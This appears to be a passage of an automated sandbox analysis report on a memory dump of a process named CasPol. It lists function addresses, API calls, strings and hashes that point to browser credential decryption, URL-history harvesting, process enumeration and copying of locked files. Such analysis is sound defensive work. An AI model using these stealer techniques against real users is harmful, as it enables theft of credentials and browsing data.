                                                                                                                                                                                    • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                                                                                                                    Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                      • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                                      • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                                                    • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                    • memset.MSVCRT ref: 0040B756
                                                                                                                                                                                    • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                    • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B80C
                                                                                                                                                                                    • CopyFileW.KERNEL32(00445FAE,?,00000000), ref: 0040B82D
                                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 0040B838
                                                                                                                                                                                    • memset.MSVCRT ref: 0040B851
                                                                                                                                                                                    • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                                                    • memcmp.MSVCRT ref: 0040B9BF
                                                                                                                                                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404453
                                                                                                                                                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                      • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                                                                                    • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                                                                                                                                                                    • String ID: chp$v10
                                                                                                                                                                                    • API String ID: 1297422669-2783969131
                                                                                                                                                                                    • Opcode ID: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                                                                                                                                                                                    • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                                                                                                                                                                                    • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                                                                                                                    Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                      • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040DDD4
                                                                                                                                                                                      • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                      • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004), ref: 0040DE3E
                                                                                                                                                                                      • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                      • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                    • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                                                                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004096EE
                                                                                                                                                                                    • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                    • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                    • UnmapViewOfFile.KERNELBASE(00000000), ref: 0040E135
                                                                                                                                                                                    • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                                    • String ID: bhv
                                                                                                                                                                                    • API String ID: 4234240956-2689659898
                                                                                                                                                                                    • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                    • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                                                    • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                    • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                                                                                                                    Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 560 413f4f-413f52 561 413fa5 560->561 562 413f54-413f5a call 40a804 560->562 564 413f5f-413fa4 GetProcAddress * 5 562->564 564->561
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,psapi.dll,00000000,00413F2F,00000000,00413E1F,00000000,?), ref: 00413F6F
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                    • API String ID: 2941347001-70141382
                                                                                                                                                                                    • Opcode ID: 5f55386481140187343ab1ab8adea668b022a311609f89b9ad52cbba2c200a76
                                                                                                                                                                                    • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f55386481140187343ab1ab8adea668b022a311609f89b9ad52cbba2c200a76
                                                                                                                                                                                    • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                                                                                                                                    Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 565 4466f4-44670e call 446904 GetModuleHandleA 568 446710-44671b 565->568 569 44672f-446732 565->569 568->569 570 44671d-446726 568->570 571 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 569->571 572 446747-44674b 570->572 573 446728-44672d 570->573 580 4467ac-4467b7 __setusermatherr 571->580 581 4467b8-44680e call 4468f0 _initterm GetEnvironmentStringsW _initterm 571->581 572->569 576 44674d-44674f 572->576 573->569 575 446734-44673b 573->575 575->569 578 44673d-446745 575->578 579 446755-446758 576->579 578->579 579->571 580->581 584 446810-446819 581->584 585 44681e-446825 581->585 586 4468d8-4468dd call 44693d 584->586 587 446827-446832 585->587 588 44686c-446870 585->588 589 446834-446838 587->589 590 44683a-44683e 587->590 592 446845-44684b 588->592 593 446872-446877 588->593 589->587 589->590 590->592 594 446840-446842 590->594 596 446853-446864 GetStartupInfoW 592->596 597 44684d-446851 592->597 593->588 594->592 598 446866-44686a 596->598 599 446879-44687b 596->599 597->594 597->596 600 44687c-446894 GetModuleHandleA call 41276d 598->600 599->600 603 446896-446897 exit 600->603 604 44689d-4468d6 _cexit 600->604 603->604 604->586
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HandleModule_initterm$EnvironmentInfoStartupStrings__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2791496988-0
                                                                                                                                                                                    • Opcode ID: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                                                                                                                                    • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                                                                                    • Opcode Fuzzy Hash: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                                                                                                                                                    Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040C298
                                                                                                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                    • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                                    • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                                                                                    • String ID: visited:
                                                                                                                                                                                    • API String ID: 2470578098-1702587658
                                                                                                                                                                                    • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                    • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                                                    • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                    • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                                                                                                                    Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 631 40e175-40e1a1 call 40695d call 406b90 636 40e1a7-40e1e5 memset 631->636 637 40e299-40e2a8 call 4069a3 631->637 638 40e1e8-40e1fa call 406e8f 636->638 643 40e270-40e27d call 406b53 638->643 644 40e1fc-40e219 call 40dd50 * 2 638->644 643->638 649 40e283-40e286 643->649 644->643 655 40e21b-40e21d 644->655 651 40e291-40e294 call 40aa04 649->651 652 40e288-40e290 free 649->652 651->637 652->651 655->643 656 40e21f-40e235 call 40742e 655->656 656->643 659 40e237-40e242 call 40aae3 656->659 659->643 662 40e244-40e26b _snwprintf call 40a8d0 659->662 662->643
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                    • free.MSVCRT ref: 0040E28B
                                                                                                                                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                      • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                                      • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                                    • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                                    • API String ID: 2804212203-2982631422
                                                                                                                                                                                    • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                                                                                                                                    • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                                                                                                                    Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                      • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?), ref: 0040CC98
                                                                                                                                                                                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                    • memset.MSVCRT ref: 0040BC75
                                                                                                                                                                                    • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                                                    • memcmp.MSVCRT ref: 0040BCD6
                                                                                                                                                                                    • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 115830560-3916222277
                                                                                                                                                                                    • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                    • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                                                                                                                    Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 716 41837f-4183bf 717 4183c1-4183cc call 418197 716->717 718 4183dc-4183ec call 418160 716->718 723 4183d2-4183d8 717->723 724 418517-41851d 717->724 725 4183f6-41840b 718->725 726 4183ee-4183f1 718->726 723->718 727 418417-418423 725->727 728 41840d-418415 725->728 726->724 729 418427-418442 call 41739b 727->729 728->729 732 418444-41845d CreateFileW 729->732 733 41845f-418475 CreateFileA 729->733 734 418477-41847c 732->734 733->734 735 4184c2-4184c7 734->735 736 41847e-418495 GetLastError free 734->736 739 4184d5-418501 memset call 418758 735->739 740 4184c9-4184d3 735->740 737 4184b5-4184c0 call 444706 736->737 738 418497-4184b3 call 41837f 736->738 737->724 738->724 746 418506-418515 free 739->746 740->739 746->724
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                                    • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                                    • free.MSVCRT ref: 0041848B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFile$ErrorLastfree
                                                                                                                                                                                    • String ID: |A
                                                                                                                                                                                    • API String ID: 77810686-1717621600
                                                                                                                                                                                    • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                                                                                    • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                                                    • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                                                                                    • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                                                                                    Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 747 40d134-40d13b 748 40d142-40d14e 747->748 749 40d13d call 40d092 747->749 751 40d160 748->751 752 40d150-40d159 748->752 749->748 753 40d162-40d164 751->753 754 40d15b-40d15e 752->754 755 40d18d-40d19f 752->755 756 40d295 753->756 757 40d16a-40d170 753->757 754->751 754->752 755->753 760 40d297-40d299 756->760 758 40d1a1-40d1a9 757->758 759 40d172-40d18b GetModuleHandleW 757->759 762 40d1f8-40d206 call 40d29a 758->762 763 40d1ab-40d1cb wcscpy call 40d626 758->763 761 40d20b-40d214 LoadStringW 759->761 766 40d216 761->766 762->761 770 40d1cd-40d1dd wcslen 763->770 771 40d1df-40d1f6 GetModuleHandleW 763->771 768 40d218-40d227 766->768 769 40d28e-40d293 766->769 768->769 772 40d229-40d235 768->772 769->760 770->766 770->771 771->761 772->769 773 40d237-40d28c memcpy 772->773 773->756 773->769
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                      • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                                                      • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                    • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                                    • String ID: strings
                                                                                                                                                                                    • API String ID: 3166385802-3030018805
                                                                                                                                                                                    • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                    • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                    • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                                                                    Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                                    • String ID: r!A
                                                                                                                                                                                    • API String ID: 2791114272-628097481
                                                                                                                                                                                    • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                                                    • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                                                    • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                                                                                    Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                      • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                      • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                                      • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                      • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                      • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
